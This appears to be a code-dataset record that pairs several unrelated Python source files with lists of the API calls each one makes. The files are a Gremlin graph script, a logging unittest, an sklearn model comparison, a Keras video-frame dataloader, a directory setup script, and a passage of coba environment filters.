edge = g.V().has('first_name', 'Mary').addE('wife_of').to(g.V().has('first_name', 'Shane')).property('known_since','1989').next()
edge = g.V().has('first_name', 'Shane').addE('father_of').to(g.V().has('first_name', 'Betty')).property('known_since','1991').next()
edge = g.V().has('first_name', 'Betty').addE('daughter_of').to(g.V().has('first_name', 'Shane')).property('known_since','1991').next()
edge = g.V().has('first_name', 'Mary').addE('mother_of').to(g.V().has('first_name', 'Betty')).property('known_since','1991').next()
edge = g.V().has('first_name', 'Betty').addE('daughter_of').to(g.V().has('first_name', 'Mary')).property('known_since','1991').next()
#print out all the node's first names
print('\n Printing first name from all nodes:')
print(g.V().first_name.toList())
#print out all the properties of person whose's first name is Shane
print('\n Printing all properties of person whose first name is Shane:')
print(g.V().has('person','first_name','Shane').valueMap().next())
#traversing the graph starting with Betty to then Shane to then Edith
print('\n Finding Betty and then looking up her parents:')
print(g.V().has('first_name', 'Betty').out('daughter_of').out('son_of').valueMap().toList())
#Print out all the nodes
print('\n Printing out all the nodes:')
people = g.V().valueMap().toList()
print(people)
#Print out all the connections (edges)
print('\n Print out all the connections (edges):')
connections = g.E().valueMap().toList()
print(connections)
#Closing the connection
remoteConn.close()
print('Connection closed!') | [
"gremlin_python.structure.graph.Graph",
"gremlin_python.driver.driver_remote_connection.DriverRemoteConnection"
]
| [((376, 383), 'gremlin_python.structure.graph.Graph', 'Graph', ([], {}), '()\n', (381, 383), False, 'from gremlin_python.structure.graph import Graph\n'), ((435, 495), 'gremlin_python.driver.driver_remote_connection.DriverRemoteConnection', 'DriverRemoteConnection', (['"""wss://<endpoint>:8182/gremlin"""', '"""g"""'], {}), "('wss://<endpoint>:8182/gremlin', 'g')\n", (457, 495), False, 'from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n'), ((528, 588), 'gremlin_python.driver.driver_remote_connection.DriverRemoteConnection', 'DriverRemoteConnection', (['"""wss://<endpoint>:8182/gremlin"""', '"""g"""'], {}), "('wss://<endpoint>:8182/gremlin', 'g')\n", (550, 588), False, 'from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n')] |
#!/usr/bin/env python
# Copyright 2015 The Swarming Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0 that
# can be found in the LICENSE file.
import logging
import os
import subprocess
import sys
import tempfile
import shutil
import unittest
import re
THIS_FILE = os.path.abspath(__file__)
sys.path.insert(0, os.path.dirname(os.path.dirname(THIS_FILE)))
from utils import logging_utils
# PID YYYY-MM-DD HH:MM:SS.MMM
_LOG_HEADER = r'^%d \d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d\d' % os.getpid()
_LOG_HEADER_PID = r'^\d+ \d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d\d'
_PHASE = 'LOGGING_UTILS_TESTS_PHASE'
def call(phase, cwd):
"""Calls itself back."""
env = os.environ.copy()
env[_PHASE] = phase
return subprocess.call([sys.executable, '-u', THIS_FILE], env=env, cwd=cwd)
class Test(unittest.TestCase):
def setUp(self):
super(Test, self).setUp()
self.tmp = tempfile.mkdtemp(prefix='logging_utils')
def tearDown(self):
try:
shutil.rmtree(self.tmp)
finally:
super(Test, self).tearDown()
def test_capture(self):
root = logging.RootLogger(logging.DEBUG)
with logging_utils.CaptureLogs('foo', root) as log:
root.debug('foo')
result = log.read()
expected = _LOG_HEADER + ': DEBUG foo\n$'
if sys.platform == 'win32':
expected = expected.replace('\n', '\r\n')
self.assertTrue(re.match(expected, result), (expected, result))
def test_prepare_logging(self):
root = logging.RootLogger(logging.DEBUG)
filepath = os.path.join(self.tmp, 'test.log')
logging_utils.prepare_logging(filepath, root)
root.debug('foo')
with open(filepath, 'rb') as f:
result = f.read()
# It'd be nice to figure out a way to ensure it's properly in UTC but it's
# tricky to do reliably.
expected = _LOG_HEADER + ' D: foo\n$'
self.assertTrue(re.match(expected, result), (expected, result))
def test_rotating(self):
# Create a rotating log. Create a subprocess then delete the file. Make sure
# nothing blows up.
# Everything is done in a child process because the called functions mutate
# the global state.
self.assertEqual(0, call('test_rotating_phase_1', cwd=self.tmp))
self.assertEqual({'shared.1.log'}, set(os.listdir(self.tmp)))
with open(os.path.join(self.tmp, 'shared.1.log'), 'rb') as f:
lines = f.read().splitlines()
expected = [
r' I: Parent1',
r' I: Child1',
r' I: Child2',
r' I: Parent2',
]
for e, l in zip(expected, lines):
ex = _LOG_HEADER_PID + e + '$'
self.assertTrue(re.match(ex, l), (ex, l))
self.assertEqual(len(expected), len(lines))
def test_rotating_phase_1():
logging_utils.prepare_logging('shared.log')
logging.info('Parent1')
r = call('test_rotating_phase_2', None)
logging.info('Parent2')
return r
def test_rotating_phase_2():
# Simulate rotating the log.
logging_utils.prepare_logging('shared.log')
logging.info('Child1')
os.rename('shared.log', 'shared.1.log')
logging.info('Child2')
return 0
def main():
phase = os.environ.get(_PHASE)
if phase:
return getattr(sys.modules[__name__], phase)()
verbose = '-v' in sys.argv
logging.basicConfig(level=logging.DEBUG if verbose else logging.ERROR)
unittest.main()
if __name__ == '__main__':
sys.exit(main())
| [
"logging.basicConfig",
"os.listdir",
"os.rename",
"os.environ.get",
"unittest.main",
"os.environ.copy",
"os.path.join",
"utils.logging_utils.CaptureLogs",
"os.path.dirname",
"utils.logging_utils.prepare_logging",
"re.match",
"tempfile.mkdtemp",
"subprocess.call",
"os.getpid",
"shutil.rmtree",
"os.path.abspath",
"logging.info",
"logging.RootLogger"
]
| [((323, 348), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (338, 348), False, 'import os\n'), ((543, 554), 'os.getpid', 'os.getpid', ([], {}), '()\n', (552, 554), False, 'import os\n'), ((721, 738), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (736, 738), False, 'import os\n'), ((770, 838), 'subprocess.call', 'subprocess.call', (["[sys.executable, '-u', THIS_FILE]"], {'env': 'env', 'cwd': 'cwd'}), "([sys.executable, '-u', THIS_FILE], env=env, cwd=cwd)\n", (785, 838), False, 'import subprocess\n'), ((2726, 2769), 'utils.logging_utils.prepare_logging', 'logging_utils.prepare_logging', (['"""shared.log"""'], {}), "('shared.log')\n", (2755, 2769), False, 'from utils import logging_utils\n'), ((2772, 2795), 'logging.info', 'logging.info', (['"""Parent1"""'], {}), "('Parent1')\n", (2784, 2795), False, 'import logging\n'), ((2840, 2863), 'logging.info', 'logging.info', (['"""Parent2"""'], {}), "('Parent2')\n", (2852, 2863), False, 'import logging\n'), ((2939, 2982), 'utils.logging_utils.prepare_logging', 'logging_utils.prepare_logging', (['"""shared.log"""'], {}), "('shared.log')\n", (2968, 2982), False, 'from utils import logging_utils\n'), ((2985, 3007), 'logging.info', 'logging.info', (['"""Child1"""'], {}), "('Child1')\n", (2997, 3007), False, 'import logging\n'), ((3010, 3049), 'os.rename', 'os.rename', (['"""shared.log"""', '"""shared.1.log"""'], {}), "('shared.log', 'shared.1.log')\n", (3019, 3049), False, 'import os\n'), ((3052, 3074), 'logging.info', 'logging.info', (['"""Child2"""'], {}), "('Child2')\n", (3064, 3074), False, 'import logging\n'), ((3110, 3132), 'os.environ.get', 'os.environ.get', (['_PHASE'], {}), '(_PHASE)\n', (3124, 3132), False, 'import os\n'), ((3227, 3297), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': '(logging.DEBUG if verbose else logging.ERROR)'}), '(level=logging.DEBUG if verbose else logging.ERROR)\n', (3246, 3297), False, 'import logging\n'), ((3300, 3315), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3313, 3315), False, 'import unittest\n'), ((384, 410), 'os.path.dirname', 'os.path.dirname', (['THIS_FILE'], {}), '(THIS_FILE)\n', (399, 410), False, 'import os\n'), ((936, 976), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""logging_utils"""'}), "(prefix='logging_utils')\n", (952, 976), False, 'import tempfile\n'), ((1125, 1158), 'logging.RootLogger', 'logging.RootLogger', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (1143, 1158), False, 'import logging\n'), ((1505, 1538), 'logging.RootLogger', 'logging.RootLogger', (['logging.DEBUG'], {}), '(logging.DEBUG)\n', (1523, 1538), False, 'import logging\n'), ((1554, 1588), 'os.path.join', 'os.path.join', (['self.tmp', '"""test.log"""'], {}), "(self.tmp, 'test.log')\n", (1566, 1588), False, 'import os\n'), ((1593, 1638), 'utils.logging_utils.prepare_logging', 'logging_utils.prepare_logging', (['filepath', 'root'], {}), '(filepath, root)\n', (1622, 1638), False, 'from utils import logging_utils\n'), ((1015, 1038), 'shutil.rmtree', 'shutil.rmtree', (['self.tmp'], {}), '(self.tmp)\n', (1028, 1038), False, 'import shutil\n'), ((1168, 1206), 'utils.logging_utils.CaptureLogs', 'logging_utils.CaptureLogs', (['"""foo"""', 'root'], {}), "('foo', root)\n", (1193, 1206), False, 'from utils import logging_utils\n'), ((1411, 1437), 're.match', 're.match', (['expected', 'result'], {}), '(expected, result)\n', (1419, 1437), False, 'import re\n'), ((1891, 1917), 're.match', 're.match', (['expected', 'result'], {}), '(expected, result)\n', (1899, 1917), False, 'import re\n'), ((2288, 2308), 'os.listdir', 'os.listdir', (['self.tmp'], {}), '(self.tmp)\n', (2298, 2308), False, 'import os\n'), ((2325, 2363), 'os.path.join', 'os.path.join', (['self.tmp', '"""shared.1.log"""'], {}), "(self.tmp, 'shared.1.log')\n", (2337, 2363), False, 'import os\n'), ((2619, 2634), 're.match', 're.match', (['ex', 'l'], {}), '(ex, l)\n', (2627, 2634), False, 'import re\n')] |
from featur_selection import df,race,occupation,workclass,country
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import cross_val_score,KFold
from sklearn.linear_model import LogisticRegression
from imblearn.pipeline import Pipeline
from sklearn.compose import ColumnTransformer
from imblearn.combine import SMOTETomek
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier,AdaBoostClassifier
from sklearn.neighbors import KNeighborsClassifier
from catboost import CatBoostClassifier
from xgboost import XGBClassifier
from sklearn.svm import SVC
from matplotlib import pyplot as plt
import seaborn as sns
df1=df.copy()
salary=df1['salary'].reset_index(drop=True)
df1=df1.drop(['salary'],axis=1)
def concat_dataframes(data):
dataframe = pd.concat([data, workclass.iloc[data.index, :], race.iloc[data.index , :], occupation.iloc[data.index, :], country.iloc[data.index, :]], axis = 1)
dataframe = dataframe.dropna()
dataframe = dataframe.reset_index(drop=True)
return dataframe
df1= concat_dataframes(df1)
features=['age_logarthmic','hours_per_week']
scaler = ColumnTransformer(transformers = [('scale_num_features', StandardScaler(), features)], remainder='passthrough')
models = [LogisticRegression(), SVC(), AdaBoostClassifier(), RandomForestClassifier(), XGBClassifier(),DecisionTreeClassifier(), KNeighborsClassifier(), CatBoostClassifier()]
model_labels = ['LogisticReg.','SVC','AdaBoost','RandomForest','Xgboost','DecisionTree','KNN', 'CatBoost']
mean_validation_f1_scores = []
for model in models:
data_pipeline = Pipeline(steps = [
('scaler', scaler),
('resample', SMOTETomek()),
('model', model)
])
mean_validation_f1 = float(cross_val_score(data_pipeline, df1, salary, cv=KFold(n_splits=10), scoring='f1',n_jobs=-1).mean())
mean_validation_f1_scores.append(mean_validation_f1)
print(mean_validation_f1_scores)
fig, axes = plt.subplots(nrows = 2, ncols = 1, figsize = (15,8))
sns.set_style('dark')
sns.barplot(y = model_labels ,x = mean_validation_f1_scores, ax=axes[0])
axes[0].grid(True, color='k')
sns.set_style('whitegrid')
sns.lineplot(x = model_labels, y = mean_validation_f1_scores)
axes[1].grid(True, color='k')
fig.show() | [
"sklearn.svm.SVC",
"sklearn.ensemble.AdaBoostClassifier",
"sklearn.tree.DecisionTreeClassifier",
"sklearn.neighbors.KNeighborsClassifier",
"sklearn.ensemble.RandomForestClassifier",
"sklearn.linear_model.LogisticRegression",
"seaborn.set_style",
"seaborn.lineplot",
"sklearn.preprocessing.StandardScaler",
"imblearn.combine.SMOTETomek",
"catboost.CatBoostClassifier",
"seaborn.barplot",
"sklearn.model_selection.KFold",
"pandas.concat",
"matplotlib.pyplot.subplots",
"xgboost.XGBClassifier",
"featur_selection.df.copy"
]
| [((706, 715), 'featur_selection.df.copy', 'df.copy', ([], {}), '()\n', (713, 715), False, 'from featur_selection import df, race, occupation, workclass, country\n'), ((2143, 2190), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'ncols': '(1)', 'figsize': '(15, 8)'}), '(nrows=2, ncols=1, figsize=(15, 8))\n', (2155, 2190), True, 'from matplotlib import pyplot as plt\n'), ((2197, 2218), 'seaborn.set_style', 'sns.set_style', (['"""dark"""'], {}), "('dark')\n", (2210, 2218), True, 'import seaborn as sns\n'), ((2219, 2287), 'seaborn.barplot', 'sns.barplot', ([], {'y': 'model_labels', 'x': 'mean_validation_f1_scores', 'ax': 'axes[0]'}), '(y=model_labels, x=mean_validation_f1_scores, ax=axes[0])\n', (2230, 2287), True, 'import seaborn as sns\n'), ((2323, 2349), 'seaborn.set_style', 'sns.set_style', (['"""whitegrid"""'], {}), "('whitegrid')\n", (2336, 2349), True, 'import seaborn as sns\n'), ((2350, 2407), 'seaborn.lineplot', 'sns.lineplot', ([], {'x': 'model_labels', 'y': 'mean_validation_f1_scores'}), '(x=model_labels, y=mean_validation_f1_scores)\n', (2362, 2407), True, 'import seaborn as sns\n'), ((837, 984), 'pandas.concat', 'pd.concat', (['[data, workclass.iloc[data.index, :], race.iloc[data.index, :], occupation.\n iloc[data.index, :], country.iloc[data.index, :]]'], {'axis': '(1)'}), '([data, workclass.iloc[data.index, :], race.iloc[data.index, :],\n occupation.iloc[data.index, :], country.iloc[data.index, :]], axis=1)\n', (846, 984), True, 'import pandas as pd\n'), ((1374, 1394), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (1392, 1394), False, 'from sklearn.linear_model import LogisticRegression\n'), ((1396, 1401), 'sklearn.svm.SVC', 'SVC', ([], {}), '()\n', (1399, 1401), False, 'from sklearn.svm import SVC\n'), ((1403, 1423), 'sklearn.ensemble.AdaBoostClassifier', 'AdaBoostClassifier', ([], {}), '()\n', (1421, 1423), False, 'from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\n'), ((1425, 1449), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {}), '()\n', (1447, 1449), False, 'from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\n'), ((1451, 1466), 'xgboost.XGBClassifier', 'XGBClassifier', ([], {}), '()\n', (1464, 1466), False, 'from xgboost import XGBClassifier\n'), ((1467, 1491), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (1489, 1491), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((1493, 1515), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (1513, 1515), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((1517, 1537), 'catboost.CatBoostClassifier', 'CatBoostClassifier', ([], {}), '()\n', (1535, 1537), False, 'from catboost import CatBoostClassifier\n'), ((1308, 1324), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (1322, 1324), False, 'from sklearn.preprocessing import StandardScaler\n'), ((1842, 1854), 'imblearn.combine.SMOTETomek', 'SMOTETomek', ([], {}), '()\n', (1852, 1854), False, 'from imblearn.combine import SMOTETomek\n'), ((1991, 2009), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': '(10)'}), '(n_splits=10)\n', (1996, 2009), False, 'from sklearn.model_selection import cross_val_score, KFold\n')] |
"""
********************************
* Created by mohammed-alaa *
********************************
Spatial Dataloader implementing sequence api from keras (defines how to load a single item)
this loads batches of images for each iteration it returns [batch_size, height, width ,3] ndarrays
"""
import copy
import random
import cv2
import numpy as np
import tensorflow.keras as keras
from .UCF_splitting_kernel import *
from .helpers import get_training_augmenter, get_validation_augmenter
class SpatialSequence(keras.utils.Sequence):
def __init__(self, data_to_load, data_root_path, batch_size, is_training, augmenter):
"""get data structure to load data"""
# list of (video names,frame/max_frame,label)
self.data_to_load = copy.deepcopy(data_to_load)
self.batch_size = batch_size
self.is_training = is_training
self.augmenter = copy.deepcopy(augmenter)
self.data_root_path = data_root_path
self.video_names, self.frames, self.labels = [list(one_of_three_tuples) for one_of_three_tuples in zip(*self.data_to_load)] # three lists
def __len__(self):
"""Denotes the number of batches per epoch"""
return (len(self.video_names) + self.batch_size - 1) // self.batch_size # ceiling div
def get_actual_length(self):
"""Denotes the total number of samples"""
return len(self.video_names)
def __getitem__(self, batch_start):
"""Gets one batch"""
batch_video_names = self.video_names[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]
batch_frames = self.frames[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]
batch_y = np.array(self.labels[batch_start * self.batch_size:(batch_start + 1) * self.batch_size])
batch_x = [] # could be less or equal batch size
#
for vid_id, _ in enumerate(batch_y):
if self.is_training: # max frame is given
frame_id = random.randint(1, batch_frames[vid_id]) # random frame (one based)
else:
frame_id = batch_frames[vid_id] # just as selected
batch_x.append(
cv2.cvtColor(cv2.imread(os.path.join(self.data_root_path, "v_" + batch_video_names[vid_id], 'frame{}'.format(str(frame_id).zfill(6)) + '.jpg')), cv2.COLOR_BGR2RGB)
)
if self.is_training:
return np.array(self.augmenter.augment_images(batch_x), dtype=np.float32) / 255.0, batch_y
else:
# no label needed since (test_video_to_label mapping) (dictionary of name to label) is returned
return batch_video_names, np.array(self.augmenter.augment_images(batch_x), dtype=np.float32) / 255.0
def shuffle_and_reset(self):
"""
new data for the next epoch
"""
random.shuffle(self.data_to_load)
self.video_names, self.frames, self.labels = [list(one_of_three_tuples) for one_of_three_tuples in zip(*self.data_to_load)] # shuffle all
class SpatialDataLoader:
def __init__(self, batch_size, testing_samples_per_video, width, height, log_stream=open("/tmp/null.log", "w"), augmenter_level=1, data_root_path='./jpegs_256/', ucf_list_path='./UCF_list/', ucf_split='01'):
"""
get the mapping and initialize the augmenter
"""
self.batch_size = batch_size
self.width, self.height = width, height
self.data_root_path = data_root_path
self.testing_samples_per_video = testing_samples_per_video
self.log_stream = log_stream
# split the training and testing videos
data_util_ = DataUtil(path=ucf_list_path, split=ucf_split)
self.train_video_to_label, self.test_video_to_label = data_util_.get_train_test_video_to_label_mapping() # name without v_ or .avi and small s .. name to numeric label starts at 0
# get video frames
self.video_frame_count = data_util_.get_video_frame_count() # name without v_ or .avi and small s
self.augmenter_level = augmenter_level
def run(self):
"""
get the data structure for training and validation
"""
train_loader = self.get_training_loader()
val_loader = self.get_testing_loader()
return train_loader, val_loader, self.test_video_to_label
def get_training_data_structure(self):
"""
get the data structure for training
"""
training_data_structure = [] # list of (video names,frame/max_frame,label)
for video_name in self.train_video_to_label: # sample from the whole video frames
training_data_structure.append((video_name, self.video_frame_count[video_name], self.train_video_to_label[video_name]))
return training_data_structure
def get_testing_data_structure(self):
"""
get the data structure for validation
"""
test_data_structure = [] # list of (video names,frame/max_frame,label)
for video_name in self.test_video_to_label:
nb_frame = self.video_frame_count[video_name]
interval = nb_frame // self.testing_samples_per_video
if interval == 0: # for videos shorter than self.testing_samples_per_video
interval = 1
# range is exclusive add one to be inclusive
# 1 > self.testing_samples_per_video * interval
for frame_idx in range(1, min(self.testing_samples_per_video * interval, nb_frame) + 1, interval):
test_data_structure.append((video_name, frame_idx, self.test_video_to_label[video_name]))
return test_data_structure
def get_training_loader(self):
"""
an instance of sequence loader for spatial model for parallel dataloading using keras sequence
"""
loader = SpatialSequence(data_to_load=self.get_training_data_structure(),
data_root_path=self.data_root_path,
batch_size=self.batch_size,
is_training=True,
augmenter=get_training_augmenter(height=self.height, width=self.width, augmenter_level=self.augmenter_level),
)
print('==> Training data :', len(loader.data_to_load), 'videos', file=self.log_stream)
print('==> Training data :', len(loader.data_to_load), 'videos')
return loader
def get_testing_loader(self):
"""
an instance of sequence loader for spatial model for parallel dataloading using keras sequence
"""
loader = SpatialSequence(data_to_load=self.get_testing_data_structure(),
data_root_path=self.data_root_path,
batch_size=self.batch_size,
is_training=False,
augmenter=get_validation_augmenter(height=self.height, width=self.width),
)
print('==> Validation data :', len(loader.data_to_load), 'frames', file=self.log_stream)
print('==> Validation data :', len(loader.data_to_load), 'frames')
return loader
if __name__ == '__main__':
data_loader = SpatialDataLoader(batch_size=64, use_multiprocessing=True, # data_root_path="data",
ucf_split='01',
testing_samples_per_video=19, width=224, height=224, num_workers=2)
train_loader, test_loader, test_video_level_label = data_loader.run()
print(len(train_loader))
print(len(test_loader))
print(train_loader.get_actual_length())
print(test_loader.get_actual_length())
print(train_loader.sequence[0][0].shape, train_loader.sequence[0][1].shape)
print(train_loader[0][0].shape, train_loader[0][1].shape)
# import tqdm
# progress = tqdm.tqdm(train_loader.get_epoch_generator(), total=len(train_loader))
# for (sampled_frame, label) in progress:
# pass
import matplotlib.pyplot as plt
# preview raw data
def preview(data, labels):
# 3 channels
fig, axeslist = plt.subplots(ncols=8, nrows=8, figsize=(10, 10))
for i, sample in enumerate(data):
axeslist.ravel()[i].imshow(data[i])
axeslist.ravel()[i].set_title(labels[i])
axeslist.ravel()[i].set_axis_off()
plt.subplots_adjust(wspace=.4, hspace=.4)
print("train sample")
for batch in train_loader.get_epoch_generator():
print(batch[0].shape, batch[1].shape)
print(batch[1])
preview(batch[0], batch[1])
break
print("test sample") # same name will be displayed testing_samples_per_video with no shuffling
for batch in test_loader.get_epoch_generator():
print(batch[1].shape, batch[2].shape)
print(batch[0], batch[2])
preview(batch[1], batch[2])
break
| [
"random.randint",
"random.shuffle",
"numpy.array",
"copy.deepcopy",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.subplots_adjust"
]
| [((760, 787), 'copy.deepcopy', 'copy.deepcopy', (['data_to_load'], {}), '(data_to_load)\n', (773, 787), False, 'import copy\n'), ((890, 914), 'copy.deepcopy', 'copy.deepcopy', (['augmenter'], {}), '(augmenter)\n', (903, 914), False, 'import copy\n'), ((1705, 1798), 'numpy.array', 'np.array', (['self.labels[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]'], {}), '(self.labels[batch_start * self.batch_size:(batch_start + 1) * self\n .batch_size])\n', (1713, 1798), True, 'import numpy as np\n'), ((2837, 2870), 'random.shuffle', 'random.shuffle', (['self.data_to_load'], {}), '(self.data_to_load)\n', (2851, 2870), False, 'import random\n'), ((8155, 8203), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': '(8)', 'nrows': '(8)', 'figsize': '(10, 10)'}), '(ncols=8, nrows=8, figsize=(10, 10))\n', (8167, 8203), True, 'import matplotlib.pyplot as plt\n'), ((8404, 8447), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'wspace': '(0.4)', 'hspace': '(0.4)'}), '(wspace=0.4, hspace=0.4)\n', (8423, 8447), True, 'import matplotlib.pyplot as plt\n'), ((1990, 2029), 'random.randint', 'random.randint', (['(1)', 'batch_frames[vid_id]'], {}), '(1, batch_frames[vid_id])\n', (2004, 2029), False, 'import random\n')] |
import os
dirs = [
'./PANDORA_files', './PANDORA_files/data', './PANDORA_files/data/csv_pkl_files',
'./PANDORA_files/data/csv_pkl_files/mhcseqs', './PANDORA_files/data/PDBs',
'./PANDORA_files/data/PDBs/pMHCI', './PANDORA_files/data/PDBs/pMHCII',
'./PANDORA_files/data/PDBs/Bad', './PANDORA_files/data/PDBs/Bad/pMHCI',
'./PANDORA_files/data/PDBs/Bad/pMHCII', './PANDORA_files/data/PDBs/IMGT_retrieved',
'./PANDORA_files/data/outputs',
'./test/test_data/PDBs/Bad','./test/test_data/PDBs/Bad/pMHCI',
'./test/test_data/PDBs/Bad/pMHCII', './test/test_data/csv_pkl_files'
]
for D in dirs:
try:
os.mkdir(D)
except OSError:
print('Could not make directory: ' + D)
# Install dependenciess
# os.popen("alias KEY_MODELLER='XXXX'").read()
# os.popen("conda install -y -c salilab modeller").read()
# os.popen("conda install -y -c bioconda muscle").read()
# os.popen("pip install -e ./").read()
| [
"os.mkdir"
]
| [((675, 686), 'os.mkdir', 'os.mkdir', (['D'], {}), '(D)\n', (683, 686), False, 'import os\n')] |
import pickle
import warnings
import collections.abc
from math import isnan
from statistics import mean, median, stdev, mode
from abc import abstractmethod, ABC
from numbers import Number
from collections import defaultdict
from itertools import islice, chain
from typing import Hashable, Optional, Sequence, Union, Iterable, Dict, Any, List, Tuple, Callable, Mapping
from coba.backports import Literal
from coba import pipes
from coba.random import CobaRandom
from coba.exceptions import CobaException
from coba.statistics import iqr
from coba.pipes import Flatten
from coba.environments.primitives import Interaction
from coba.environments.logged.primitives import LoggedInteraction
from coba.environments.simulated.primitives import SimulatedInteraction
class EnvironmentFilter(pipes.Filter[Iterable[Interaction],Iterable[Interaction]], ABC):
"""A filter that can be applied to an Environment."""
@abstractmethod
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
"""Apply a filter to an Environment's interactions."""
...
class Identity(pipes.Identity, EnvironmentFilter):
"""Return whatever interactions are given to the filter."""
pass
class Take(pipes.Take, EnvironmentFilter):
"""Take a fixed number of interactions from an Environment."""
pass
class Shuffle(pipes.Shuffle, EnvironmentFilter):
"""Shuffle a sequence of Interactions in an Environment."""
pass
class Reservoir(pipes.Reservoir, EnvironmentFilter):
"""Take a fixed number of random Interactions from an Environment."""
pass
class Scale(EnvironmentFilter):
"""Shift and scale features to precondition them before learning."""
def __init__(self,
shift: Union[Number,Literal["min","mean","med"]] = 0,
scale: Union[Number,Literal["minmax","std","iqr","maxabs"]] = "minmax",
target: Literal["features","rewards"] = "features",
using: Optional[int] = None):
"""Instantiate a Scale filter.
Args:
shift: The statistic to use to shift each context feature.
scale: The statistic to use to scale each context feature.
target: The target data we wish to scale in the environment.
using: The number of interactions to use when calculating the necessary statistics.
"""
assert isinstance(shift,Number) or shift in ["min","mean","med"]
assert isinstance(scale,Number) or scale in ["minmax","std","iqr","maxabs"]
self._shift = shift
self._scale = scale
self._using = using
self._target = target
@property
def params(self) -> Dict[str, Any]:
return {
"scale_shift": self._shift,
"scale_scale": self._scale,
"scale_using": self._using,
"scale_target": self._target
}
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
iter_interactions = iter(interactions)
fitting_interactions = list(islice(iter_interactions,self._using))
shifts : Dict[Hashable,float] = defaultdict(lambda:0)
scales : Dict[Hashable,float] = defaultdict(lambda:1)
unscaled: Dict[Hashable,List[Any]] = defaultdict(list)
if any([isinstance(i.context,dict) for i in fitting_interactions]) and self._shift != 0:
raise CobaException("Shift is required to be 0 for sparse environments. Otherwise the environment will become dense.")
mixed = set()
had_non_numeric = set()
for interaction in fitting_interactions:
if self._target == "features":
for name,value in self._feature_pairs(interaction.context):
if name in mixed: continue
is_numeric = isinstance(value,Number)
is_nan = is_numeric and isnan(value)
if is_nan:
pass
elif (not is_numeric and name in unscaled) or (is_numeric and name in had_non_numeric):
mixed.add(name)
if name in unscaled: del unscaled[name]
if name in had_non_numeric: had_non_numeric.remove(name)
elif not is_numeric:
had_non_numeric.add(name)
elif is_numeric and not is_nan:
unscaled[name].append(value)
if self._target == "rewards":
unscaled["rewards"].extend(interaction.rewards)
if mixed: warnings.warn(f"Some features were not scaled due to having mixed types: {mixed}. ")
has_sparse_zero = set()
for interaction in fitting_interactions:
if isinstance(interaction.context,dict):
has_sparse_zero |= unscaled.keys() - interaction.context.keys() - {"rewards"}
for key in has_sparse_zero:
unscaled[key].append(0)
for name, values in unscaled.items():
if isinstance(self._shift, Number):
shift = self._shift
if self._shift == "min":
shift = min(values)
if self._shift == "mean":
shift = mean(values)
if self._shift == "med":
shift = median(values)
if isinstance(self._scale, Number):
scale_num = self._scale
scale_den = 1
if self._scale == "std":
scale_num = 1
scale_den = stdev(values)
if self._scale == "minmax":
scale_num = 1
scale_den = max(values)-min(values)
if self._scale == "iqr":
scale_num = 1
scale_den = iqr(values)
if self._scale == "maxabs":
scale_num = 1
scale_den = max([abs(v-shift) for v in values])
shifts[name] = shift
scales[name] = scale_num/scale_den if round(scale_den,10) != 0 else 1
for interaction in chain(fitting_interactions, iter_interactions):
scaled_values = {}
final_context = interaction.context
final_rewards = None
final_kwargs = interaction.kwargs.copy()
if self._target == "features":
for name,value in self._feature_pairs(interaction.context):
if isinstance(value,Number):
scaled_values[name] = (value-shifts[name])*scales[name]
else:
scaled_values[name] = value
if interaction.context is None:
final_context = None
elif isinstance(interaction.context,dict):
final_context = scaled_values
elif isinstance(interaction.context,tuple):
final_context = tuple(scaled_values[k] for k,_ in self._feature_pairs(interaction.context))
else:
final_context = scaled_values[1]
if self._target == "rewards":
final_rewards = [ (r-shifts['rewards'])*scales['rewards'] for r in interaction.rewards ]
if isinstance(interaction, SimulatedInteraction):
yield SimulatedInteraction(
final_context,
interaction.actions,
final_rewards or interaction.rewards,
**interaction.kwargs
)
elif isinstance(interaction, LoggedInteraction):
yield LoggedInteraction(
final_context,
interaction.action,
interaction.reward,
interaction.probability,
interaction.actions,
**interaction.kwargs
)
else: #pragma: no cover
raise CobaException("Unknown interactions were given to Scale.")
def _feature_pairs(self,context) -> Sequence[Tuple[Hashable,Any]]:
if isinstance(context,dict ): return context.items()
if isinstance(context,tuple): return enumerate(context)
if context is not None : return [(1,context)]
return []
class Impute(EnvironmentFilter):
"""Impute missing values (nan) in Interaction contexts."""
def __init__(self,
stat : Literal["mean","median","mode"] = "mean",
using: Optional[int] = None):
"""Instantiate an Impute filter.
Args:
stat: The statistic to use for impuatation.
using: The number of interactions to use to calculate the imputation statistics.
"""
assert stat in ["mean","median","mode"]
self._stat = stat
self._using = using
@property
def params(self) -> Dict[str, Any]:
return { "impute_stat": self._stat, "impute_using": self._using }
